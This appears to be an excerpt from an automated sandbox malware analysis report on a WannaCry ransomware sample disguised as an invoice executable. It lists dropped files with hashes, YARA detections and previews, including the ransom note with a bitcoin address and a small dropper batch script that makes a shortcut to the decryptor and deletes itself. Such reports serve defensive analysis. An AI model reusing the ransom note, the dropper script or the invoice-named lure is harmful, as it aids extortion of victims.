                                                          Category:dropped
                                                          Size (bytes):9608
                                                          Entropy (8bit):7.981340441988807
                                                          Encrypted:false
                                                          SSDEEP:192:5PrHkT0i18uhR8N98CCXCEgxRlpBoIosqiAf1kwcEzmpMQ86sTPNGu7K:xrHkT068uhGf87XCEoRtolu5wcam2Q8+
                                                          MD5:8CEF8B5EF3D340C933E010038A061291
                                                          SHA1:3A3AA34396C7A32D663388F745C6A6B3CCC3A9A7
                                                          SHA-256:04217D9F6BD548C62683F7DAC1062584D91AE504E7DD18B6838852418510E201
                                                          SHA-512:3160AD0310D8B6426C464F5738ACCD79E9AAD6246E276AA7F76E917BEB2AD8871D78C1E38615AF8E444C27FC3F91DC32AA6CC0C5EDE129C700C89039C6AED1E2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....+..*.......k+...9....G.&.d..I..A[*...#X.]..b.._.......%....:.:w..0.=y..L..9k..Lor..:S...w|.6....^.{..[m......e.+.../;.cO*.&..G.-...r.....c...r..f....Q..F4..]w.<...Z..&V....U..#.,~b.I...P....S.y!.g.j..-C.]....-.....(.F...n.|...1....?.VR...\.C....f$......H..P.l....}.......o..$;..'N.......;..)#...,.nJF.uT...R...o....."......@.~...UY...$...!cq..W...(X.K.qI...!..c\2T...3 kw....Q.........[\..%...s...3....U....g.U.....b.2..w..iF.O..X.[.)...Z.}.a.........-...n.F.......C\.;......-(...a"J..+...XA.'1.M.....6mC..d3.Y-.....G'._}G.e..}...'...8..R.{..!......o.e..Z.~hd8x..@.~..F.nm..,.d!....w.b..\..0...=....<.U.u.%........d.G...a..L..i.....I.Q._/........;..g_..y...%..O..Jp.\.,.._[....u....e..;......... ...w.+.....w....:%.O.Y...%..Il.J%.$B.-`.J:...v.pS......;a4.3\.P...f......X.....1...mc..kH.+.D...N..-i..n]n.C...ujR?J*.:.._.....%+...>..D.&..pY>I..O..Zr/F.x?cfuH..D5....gr......W.<O8.#..O.F.......T.h.;.q>+nrq.{.<....a..u.9?.4....>.....6.}![K..>.
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):11390
                                                          Entropy (8bit):6.048875955337293
                                                          Encrypted:false
                                                          SSDEEP:192:rh4D8V05d1hN13Ff9wY40VVs/1h8PIetFBor4inaTDYfIVVdzfP1hitMY4THRekI:rh4YVc1h1f/40VVq1h8PXtFU4WGYgVVU
                                                          MD5:7399C7C8EC15873AD98414AF2EF67463
                                                          SHA1:CED0A4BFFC3D9137660A2A8202813525DBE189F6
                                                          SHA-256:B1A3B5F2E2928CDFCE04E5FE539EFEF2CF3AF5891F12F8B1DB47CFAAE61BEB73
                                                          SHA-512:461920F6030EAFF55BD185351C7B8A966365FCBFD367FFB61D3008E3DC9114C6D273D262C5D55411342405B102FBF8C458F32EA98EF2670C9EC5509C7379329E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:dir-key-certificate-version 3..fingerprint E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58..dir-key-published 2023-04-25 08:58:01..dir-key-expires 2024-10-25 08:58:01..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu/DOrbv/4IAYvyxsy/6ivC3q5yCQBWLKHZGYKQa5G/3rem8wen0f..qF7y4ye6U6faWc5kcNMHEKMIeBzMErxwF345qoGHITxbbOWnizgwPgrdCwlK3p0H..1XZGU/TTjoaM25P+ZNCBvGmDQRAtgs2odnv+i8hpu6vrcAUZYXmmw/Ag1Ou2AlLC..mPpbjV1O5SMylgC4IuCBPr3iA+M1kKkvj4LmwU6pJxjAae76GLzzQ/Ffvi7rRpvU..2BHetjehk+7/t8izgbhT4VABtzKgrv9ATnhfEgPeT/WBq0E75iciBBAXRPF5kEA4..k++NPy21XpL7jkQ4wnMs2HyiFhHbUwbLcoyQ/JVq/WBboSwStYbkdizRpkhJ1eNg..LiD8CPWcZnhWZi9VWrwT0xl+Mu4v6kwo9kVnXhOfcK8Wni9FqiBu2tmNDoGPG1Ac..wptYQSIoujuLgn4MARREwo9cWrKp2w+D7Dt4U7U5OrXL7TXjonEKuEHwRhzz1JA8..7LXm/wENwn1/AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAv28sclFL4zONBiZYTd2gE8dHTId7hsjP98H4PcY+IeVPs2hqdCTA..O0SsaOEGL9kGzzhWr7NUujDzHJ6j9xiCj4vePC/78/lN5tihjTD4TNzcrxEI6K08..mE6B5iXyuafojb7d1/3ssZ/qDjyj
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2901012
                                                          Entropy (8bit):5.640507376056186
                                                          Encrypted:false
                                                          SSDEEP:12288:NdgcaLDCOT+xVaLkI2KZkhLU/Jmi1ORcq0hsOaxuwvaIDsaMQ9nmxrZKZjAqKQRR:N1OKokX5U/JbPSxbzyrZmR9nXJhb
                                                          MD5:52928D1A674FE90BFC1795C0514E1368
                                                          SHA1:8674B896AE248E083550B888AD550C5A38B57643
                                                          SHA-256:72300AAAA81E3709129A6404D7C16EAC48CCF4339AEBECE5D608C0FE253AA80B
                                                          SHA-512:99CCD597D08C15D8B22E69A8333F11D5EC9E586E62FFDA99B0D661582E8CB4A4697F0746BDF388EBB583784E3B9F0358A47CEC004C7BC16DF1CB8FA9ABA6D88B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-01-16 10:00:00..fresh-until 2024-01-16 11:00:00..valid-until 2024-01-16 13:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Rel
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):385
                                                          Entropy (8bit):5.228822700626254
                                                          Encrypted:false
                                                          SSDEEP:6:SbdWwxXa5nXr87+QVe2vwR/EnNiUCsT08zU6WUcGAuWWURbibfl88x:bwxX4Xr87HVBvwNOF0d6WxGAUPh
                                                          MD5:5E415EE805C3D619C720B91D14E6AFD1
                                                          SHA1:52835A4B95C01845A6C8D7A40F8843881305BD8A
                                                          SHA-256:D298FD5A0380F5C2303BADE59F6717600696B494C3AC72AFEE1AC92A668EE9CD
                                                          SHA-512:6247BA3E16782D8C8C66D22A6A95DE7F575D47E9A384CB2597BEBED99B9D47F2B8195DFAB88CA95979F2D3536FEB6FFD79DBBA7122470F8B126B94872F5CD5F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2024-01-16 12:00:22 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard cozybeardev AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C DirCache..EntryGuardAddedBy AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C 0.2.9.10 2023-12-18 19:51:54..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-01-16 11:00:22..
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):385
                                                          Entropy (8bit):5.228822700626254
                                                          Encrypted:false
                                                          SSDEEP:6:SbdWwxXa5nXr87+QVe2vwR/EnNiUCsT08zU6WUcGAuWWURbibfl88x:bwxX4Xr87HVBvwNOF0d6WxGAUPh
                                                          MD5:5E415EE805C3D619C720B91D14E6AFD1
                                                          SHA1:52835A4B95C01845A6C8D7A40F8843881305BD8A
                                                          SHA-256:D298FD5A0380F5C2303BADE59F6717600696B494C3AC72AFEE1AC92A668EE9CD
                                                          SHA-512:6247BA3E16782D8C8C66D22A6A95DE7F575D47E9A384CB2597BEBED99B9D47F2B8195DFAB88CA95979F2D3536FEB6FFD79DBBA7122470F8B126B94872F5CD5F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2024-01-16 12:00:22 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard cozybeardev AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C DirCache..EntryGuardAddedBy AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C 0.2.9.10 2023-12-18 19:51:54..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-01-16 11:00:22..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:b.out overlay separate pure standalone executable Large Text Large Data Huge Objects Enabled
                                                          Category:dropped
                                                          Size (bytes):276
                                                          Entropy (8bit):7.067381929986639
                                                          Encrypted:false
                                                          SSDEEP:6:mtNr/SK7yjSSAfIO3vvhjzA5NS5B8Tg7dVfusOdYZTRHjYufxzNV9cyLz:YrSK7yjpAfIO3vv9sjp07fu9yTRHJxzl
                                                          MD5:5C44F9900D22F5A4747C58AD37CCF75A
                                                          SHA1:7E61B2C4EC9A8857A7999876AAA6AC771EAA84F5
                                                          SHA-256:3AE342251939D989640A8F75AD5FBF9C3086E36D17B1DCEE2CD0AF002B443DBD
                                                          SHA-512:1307FD40835F8D6880CF3AF3F0CAA2F3F80D3396F82DA96E78DC4D71BD4CABB127C7340A29565BD47F2D3170CD4CC4479AE0EC31846AA169D38A5721271C0B3C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):136
                                                          Entropy (8bit):1.5381653707365446
                                                          Encrypted:false
                                                          SSDEEP:3:r8thDA19ek+d/n:E9k+d/
                                                          MD5:94231ACB146EEEA45F734B8F5B322E58
                                                          SHA1:02781A444D76FBF8A538E292C528843E928639D8
                                                          SHA-256:F7EA13CCF5CCE5C013278A7D57025D362B3FBD5F1B6025D2809C894B45FEC679
                                                          SHA-512:D17E5781E94BD5C764F5B14762FA651217D862522993CCE2B282CDCA1E456C2F1D9D94B4BB21A19B3939312D81548BE85FDA26337EAC71484301905A08A2DE81
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):316
                                                          Entropy (8bit):5.067197469242794
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDfewSiponv6xewImKFcsDT6MWlynJ96wYexi+XCrbPT6MWlynJfF06xiHYwc0:hqn4+B9TGoJgpPGoJ0F9a2T2ZLT2Ln
                                                          MD5:70B5BF1FF46B32008E19BB544482FF97
                                                          SHA1:EDF0A524FB6682672B3AA8D98EE48F85212B8C2D
                                                          SHA-256:1A71C699D7C8744E9C648C2B2A2B4403E0A697DAC4FC5B5377ABD9BAE921C972
                                                          SHA-512:0200AAFB050FE9212060FAA05C849F5A6353090FEB6CD631AEBED1180F06863736A63C0B5E7CFD9E4070740997AC59E6491F6E0A4C9CAAE135C97ED4F4410BAC
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\118491705402797.bat, Author: Florian Roth
                                                          Reputation:unknown
                                                          Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                          Category:dropped
                                                          Size (bytes):1440054
                                                          Entropy (8bit):0.3363393123555661
                                                          Encrypted:false
                                                          SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                          MD5:C17170262312F3BE7027BC2CA825BF0C
                                                          SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                          SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                          SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cscript.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818964312449045
                                                          Encrypted:false
                                                          SSDEEP:24:E0K1eCqnPNivBFTim1KhKRtmSiykM0mlSkpTEjNTg/kkdf:lK8JFi7um1QKjBiykmlSkpTEtmf
                                                          MD5:693AC9ED94F92B2C19E1738ED459B007
                                                          SHA1:02B6C15A208B38D7181DE3417077886444E6B351
                                                          SHA-256:0F91E5493EF4D233510B4EB0A4301120B68BA60511C89DA8A462D2E491FDC096
                                                          SHA-512:9ADD0AAB299EA1C30E4B672697237F4773742CC766E55C72DCF6C50900F03CC42FCE0647CCC5929EF5506770DEEB6CFA427B83E8D50041C316A4ED532DD859FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.811585609914724
                                                          Encrypted:false
                                                          SSDEEP:24:bk6Gw/xcy4fqC22Hctw0kORD95lZBAEt3dcwo2px6qP4yYjvNWWJCkuavcNqg:bk6Ga412ecK0kQhL/PBXaY4yYjVSVavA
                                                          MD5:B8D3B838143EBCB53ABF999D6F49A316
                                                          SHA1:FC8C1C5DF72050BE909CE11BA8F6F8880273ED6E
                                                          SHA-256:7645B75AF9A44A2B29801593778818A9689753B58701C6E051FCB306ED3A7D48
                                                          SHA-512:24DC0F43AEBC4D0828596D197C740860F48AC9340EFA39CA6E174BFD1C5AAC19EAA8EDE333F1B3FE00520948480E72CFBB195C8762B02E87853F0C6615ED0C2B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......"D......7.O.X.1m.,p)..F.S.9^..c....?.....,.....a[.B.?0.h.....w.o.(P.....b.6..'..Z.$..DT.[ZT.q...Ta.....BJP..I...g.P.|W...-.?.%.....D.:L>c.....y.S.c.:..0\^....m.;E.._..q...8&...xx......n:' .../...(.......O`....[.....os.t.~.w.n...,9....5.~n............(.\.}p8b...S.X.l_ILe.......P...j..w.F..x.8..}.......2,...L...d,<..},.....#.:.6.sP-Z...2.j{B...!.....).:n...Z.$...cU.........N..C.......\\cI.Pb.dW.JY"e..\Zb.9O.%. M.*....dF.T...z.....6y..B...X.4... ~..JEo......ngp....=.9J.XP..q..%Vw=...Y...mbLlaS....`u..>.F&........0........0......v...9.......2..Ra;m..[....1...J.......>.?..*.w.D.}.....z.xXQ...S.....A..EI . .3.@.8..M..fl.1SMy.......Ao..Y..L@....)v....m0l+P(.U...:c...T.j.0.8...M.@..X=....u.q..@.h.....$.sK.O.|O.oPqp..:.....&..7..fw=t...G@c*w.6.V........0....p...*.f.}s._H).X.B..^.<.,S:7.&y.S.'."Z...ohO<.P.b:.*.oO.Z.....>.+.&..V....v.Kb6=..i.r3}{...~J.+O.F..r...S.q..f.=...<...C.0..m......"..5i..~^......*C....*S!.....m..P_.....m
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781409953882536
                                                          Encrypted:false
                                                          SSDEEP:24:pT2h3DHzKBlJ9ahlg9HsYGNrOL03LkYr2bOljU4S5XKV:pEDoJ9Og9yAApqOjtL
                                                          MD5:5F1B4D658538AB62FC6B74552BC3FB94
                                                          SHA1:6744674F0145918AE65BDDCAADBA9A3BAB1ECD77
                                                          SHA-256:D829E74D741B08C7D2FC1BAE8FAF68B8818C255A84A823B839CC0806C6831BB4
                                                          SHA-512:4CD51F4E378ADEEEB3807C9C0C5662A97142899E9A7E29324BBAC369A0ED444C60D925B4BEB1F8353723CAC95D2127CE2151CB413BC33DC12C0057F73714C22E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.819803825174579
                                                          Encrypted:false
                                                          SSDEEP:24:bkhWqoXfVzKLurwS7xikAo/aRQSRu4W51gtDHjPCOww6yZ2TQH0AAKcdMdxDhz:bkhEPVzzrwgSQ53gtDHjPIJyZSecKcd6
                                                          MD5:0BC12847787B3ECDD5B1246BEE70B0BF
                                                          SHA1:3CCA754F3947D39EFFBEBCD8A926204112704714
                                                          SHA-256:D44A7A1CE1A6CCEE703BF5C00659EC3D9DB68B5382613F312D7648038B0E87C8
                                                          SHA-512:0CCDE623A0617100CAA3E2B760A4845AB3CC67FF6349AF82F751799B0848F3CDBD05CAF2790101D62305F3A0B1081D57B528288161DBD7EC281D09EDFCB719D4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....&d...P..o..{au....\.'..&C.r......kh..Ou.H.b.....,..../v......K.....s....x.RrJA..t......B...;.t&1..Y..a..4.|.wP...:.S,..M..t.r.f.R"y...{...Ra..).s...9.........:..3..WB|...q.f4..^ .....(O./...v$uV1L.c...c..IA}.gFA[...3hW./p=.e..e.R.O.3t....}M............../"E/Yo.....:......,..-..~(..m.f/.O..?.<.`A..Z.uz..Z.....B....r..../..M(...6`...R...a..@...hp.V..3.<M..tt..:..R....W....9...).t.H..n..M0....4EQ`..i.....@..^.~..#b..XP(..h..&.p$....c..+.).z.kPx...../.2.x...U...E.Y...M.....uxz..S$.......-[)\......x._w.'2.g..g.3.=;Z.)..,...i..0I....$k S.j.'.Eq.h..K.!RB...[.......A0..[..I2@..O..7]0.\........|....hd.+.6..PG..b..<Kq.X..X.xr..fm....M4..g...r..'.....(..zO..xm>.r.`......%.-n...7.n.$iB....^..V.R._.!..S.......#........:.a..R..7.r...?..r|.$.......-T..!..!.4..j...M....Vf .n. jGw..1..c.Y.....l........M...._.x..p.....>...B...}B.@..7".D.*N.l...~...K............4.....j...;.J.P..@A....Pcv...:..&.14....d/....N2M%.,,.X...l...Qx..T......4>.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.791694000979164
                                                          Encrypted:false
                                                          SSDEEP:24:Gvo2sPGUIVL5vgre/826KYJx7pE4sCQD+XWR/X3cKn/wLmsN9+TY:GvoPGd5IS5YJDQaXa3cswX9SY
                                                          MD5:8C699AE84923B9CED1B0F4EA0E538450
                                                          SHA1:5012063E03E46C6C00EA33A74E2AF46FD65CF555
                                                          SHA-256:2E4AEA52093E5FEDFCB7A62D470E84E019E9F0AB5CA576717AFE95318CDDF5EC
                                                          SHA-512:267FF2ADA241A9DE075CD5FA4A092EDA4872ADA9059F765CC255A7AB17C44C9D98CAA8243CA37D616DBB0EE7B12330112B31C225ABF8B700B1A153D2CD938320
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.85180929987057
                                                          Encrypted:false
                                                          SSDEEP:24:bkbkA+aj5OQndftQMXm1JTcrKacGbIw2zWE62Mf26dhf6SrdRFsd59Fy:bkjj5ZVtPqkKx1w9E6Lf9p6SX259Q
                                                          MD5:35C43C2F7BF042D9619F74F0577388E3
                                                          SHA1:2A93CB0E0C16995181BF446B22B18533A5400290
                                                          SHA-256:30C32DE0621904187610F86234ABA18BBA95E73DA6C52774AC70C7F98AC1C357
                                                          SHA-512:993DD47705A728EBB00F518C8A01290A01F714625488E883E245BDF97BC0A31203D423EB1BA47495FDEB40B16CC7703E344FEDB6E8961FF0847B8E235ECBD2DB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
